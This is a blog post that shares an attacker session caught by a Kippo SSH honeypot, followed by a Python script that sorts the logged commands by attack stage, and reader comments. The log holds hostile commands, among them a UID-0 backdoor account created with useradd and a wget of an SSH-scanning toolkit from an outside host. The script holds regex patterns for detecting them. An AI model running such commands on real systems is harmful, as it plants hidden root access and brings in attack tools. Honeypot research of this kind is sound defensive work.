SeventhOctober.net

sequel7's ramblings

O RLY?

It would appear that my first shot at a honeypot has been an amusing success :-)

www:~# w
13:27:54 up 14 days,  3:53,  1 user,  load average: 0.08, 0.02, 0.01
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    77.28.252.122     13:27    0.00s  0.00s  0.00s w
www:~# ls
www:~# uptime
13:28:00 up 14 days,  3:53,  0 users,  load average: 0.08, 0.02, 0.01
www:~# wget
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.
www:~# cat /proc/cpuinfo
processor    : 0
vendor_id    : GenuineIntel
cpu family    : 6
model        : 23
model name    : Intel(R) Core(TM)2 Duo CPU     E8200  @ 2.66GHz
stepping    : 6
cpu MHz        : 2133.305
cache size    : 6144 KB
physical id    : 0
siblings    : 2
core id        : 0
cpu cores    : 2
apicid        : 0
initial apicid    : 0
fpu        : yes
fpu_exception    : yes
cpuid level    : 10
wp        : yes
flags        : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips    : 4270.03
clflush size    : 64
cache_alignment    : 64
address sizes    : 36 bits physical, 48 bits virtual
power management:

processor    : 1
vendor_id    : GenuineIntel
cpu family    : 6
model        : 23
model name    : Intel(R) Core(TM)2 Duo CPU     E8200  @ 2.66GHz
stepping    : 6
cpu MHz        : 2133.305
cache size    : 6144 KB
physical id    : 0
siblings    : 2
core id        : 1
cpu cores    : 2
apicid        : 1
initial apicid    : 1
fpu        : yes
fpu_exception    : yes
cpuid level    : 10
wp        : yes
flags        : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips    : 4266.61
clflush size    : 64
cache_alignment    : 64
address sizes    : 36 bits physical, 48 bits virtual
power management:

www:~# wget
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.
www:~# passwd
Enter new UNIX password: islamizacija54321
Retype new UNIX password: islamizacija54321
Sorry, passwords do not match
passwd: Authentication information cannot be recovered
passwd: password unchanged
www:~# passwd
Enter new UNIX password: islamizacija54321
Retype new UNIX password: islamizacija54321
Sorry, passwords do not match
passwd: Authentication information cannot be recovered
passwd: password unchanged
www:~# /usr/sbin/useradd -o -u 0 user
Adding user `user' ...
Adding new group `user' (1001) ...
Adding new user `user' (1001) with group `user' ...
Creating home directory `/home/user' ...
Copying files from `/etc/skel' ...
Password: islamizacija54321
Password again: islamizacija54321

Changing the user information for test123
Enter the new value, or press ENTER for the default
Username []: serdzan
Full Name []: serdzan abdi
Room Number []: 1
Work Phone []: /
Home Phone []: /
Mobile Phone []: /
Country []: /
City []: /
Language []: /
Favorite movie []: /
Other []: /
Is the information correct? [Y/n] y
ERROR: Some of the information you entered is invalid
Deleting user `user' ...
Deleting group `user' (1001) ...
Deleting home directory `/home/user' ...
Try again? [Y/n] n
www:~# adduser
adduser: Only one or two names allowed.
www:~# adduser serdzan
Adding user `serdzan' ...
Adding new group `serdzan' (1001) ...
Adding new user `serdzan' (1001) with group `serdzan' ...
Creating home directory `/home/serdzan' ...
Copying files from `/etc/skel' ...
Password: islamizacija54321
Password again: islamizacija54321

Changing the user information for test123
Enter the new value, or press ENTER for the default
Username []: hi
Full Name []: hhi
Room Number []: 2
Work Phone []: /
Home Phone []: +38970554214
Mobile Phone []: +35897052555
Country []: bulgaria
City []: sofia
Language []: english
Favorite movie []: 2012
Other []: noting
Is the information correct? [Y/n] y
ERROR: Some of the information you entered is invalid
Deleting user `serdzan' ...
Deleting group `serdzan' (1001) ...
Deleting home directory `/home/serdzan' ...
Try again? [Y/n] n
www:~# wget http://gblteam.webs.com/gosh.tgz.tar
--2010-04-08 13:39:02--  http://gblteam.webs.com/gosh.tgz.tar
Connecting to gblteam.webs.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1642769 (1M) [application/x-tar]
Saving to: `gosh.tgz.tar'

100%[======================================>] 1,642,769    143K/s  eta 0s

2010-04-08 13:39:13 (143 KB/s) - `gosh.tgz.tar' saved [1642769/1642769]
www:~# tar -zxvf gosh.tgz.tar
gosh
gosh/3
gosh/4
gosh/common
gosh/go.sh
gosh/scam
gosh/pscan2
gosh/ss
gosh/5
gosh/vuln.txt
gosh/1
gosh/mfu.txt
gosh/pass_file
gosh/gen-pass.sh
gosh/secure
gosh/2
gosh/ssh-scan
gosh/a
www:~# cd gosh
www:/root/gosh# touch bios.txt
bash: touch: command not found
www:/root/gosh# touch bios.txt
bash: touch: command not found
www:/root/gosh# chmod +x *
www:/root/gosh# ./go.sh 77
___
{o,o}
|)__)
-"-"-
O RLY?
___
{o,o}
|)__)
-"-"-
O RLY? y
___
{o,o}
(__(|
-"-"-
NO WAI!
www:/root/gosh# ./go.sh 77
___
{o,o}
|)__)
-"-"-
O RLY? yes
___
{o,o}
(__(|
-"-"-
NO WAI!
www:/root/gosh# ./go
bash: ./go: command not found
www:/root/gosh# ./go.sh
___
{o,o}
|)__)
-"-"-
O RLY? no
___
{o,o}
|)__)
-"-"-
O RLY? no
___
{o,o}
|)__)
-"-"-
O RLY? k
___
{o,o}
|)__)
-"-"-
O RLY? y
___
{o,o}
(__(|
-"-"-
NO WAI!
www:/root/gosh#
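
The session above follows a recognisable pattern: recon (w, uptime, cpuinfo), an attempt to change root's password, an attempt to add a second UID-0 account with useradd -o -u 0, then download, unpack, chmod +x and run a toolkit. As an added example (my own code, not part of the original post and not Kippo's), here is a small Python triage pass over a constructed subset of those commands that counts each stage and flags the ones a defender should alert on; the rule names, regexes, classify() and triage() are all my own assumptions.

```python
import re

# Constructed sample: the commands from the session above, prompt stripped.
SESSION = """\
w
uptime
cat /proc/cpuinfo
passwd
/usr/sbin/useradd -o -u 0 user
adduser serdzan
wget http://gblteam.webs.com/gosh.tgz.tar
tar -zxvf gosh.tgz.tar
cd gosh
chmod +x *
./go.sh 77
"""

# Hypothetical rules (label, regex); labels name the stages seen in the log.
RULES = [
    ("recon",         re.compile(r"^(w|uptime|cat /proc/cpuinfo|id|uname)\b")),
    ("cred-change",   re.compile(r"^passwd\b")),
    # useradd -o -u 0: a second account with UID 0, i.e. a root-equivalent backdoor
    ("uid0-backdoor", re.compile(r"useradd\b.*-o\b.*-u\s*0\b|useradd\b.*-u\s*0\b.*-o\b")),
    ("new-account",   re.compile(r"^(?:\S*/)?(adduser|useradd)\s+\S+")),
    ("tool-download", re.compile(r"^(wget|curl|ftp)\s+\S+://")),
    ("tool-stage",    re.compile(r"^(tar\s+-?[xzvf]+|chmod\s+\+x)\b")),
    ("tool-exec",     re.compile(r"^\./\S+")),
]

# Stages that should page someone rather than just be counted.
ALERT_STAGES = {"uid0-backdoor", "tool-download", "tool-exec"}

def classify(command):
    """Return every rule label the command matches, in RULES order."""
    return [label for label, rx in RULES if rx.search(command)]

def triage(transcript):
    """Count commands per stage and collect the ones that warrant an alert."""
    stages, alerts = {}, []
    for cmd in transcript.splitlines():
        cmd = cmd.strip()
        labels = classify(cmd)
        for label in labels:
            stages[label] = stages.get(label, 0) + 1
        if ALERT_STAGES & set(labels):
            alerts.append(cmd)
    return {"stages": stages, "alerts": alerts}
```

Run triage(SESSION) to get the per-stage counts and the three alert-worthy commands (the UID-0 useradd, the wget, and the ./go.sh launch).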

Written by sequel7

April 8th, 2010 at 2:49 pm

Posted in Hacking

3 Responses to 'O RLY?'

  1. You’ve gotta love watching people ‘hack’ your Kippo box!

    Thanks for sharing, gave me the nudge to go back and take a closer look at the hits I’ve had on my installation since last look.

    –Andrew Waite

    Andrew Waite

    1 Jan 11 at 04:35

  2. This is great, Kippo is awesome and in my top 5 honeypots.
    I highly recommend NOT running it as root, and giving it user privs. Have it listen on port 2222 (default) and, depending on your setup, use port forwarding to have it listen on port 22 (SSH default).

    Yankee

    5 Mar 11 at 22:03

  3. Yup, that’s actually exactly the way I had it set up :-) Had a lot of fun with that… I should set it up again sometime.

    sequel7

    5 Mar 11 at 22:05
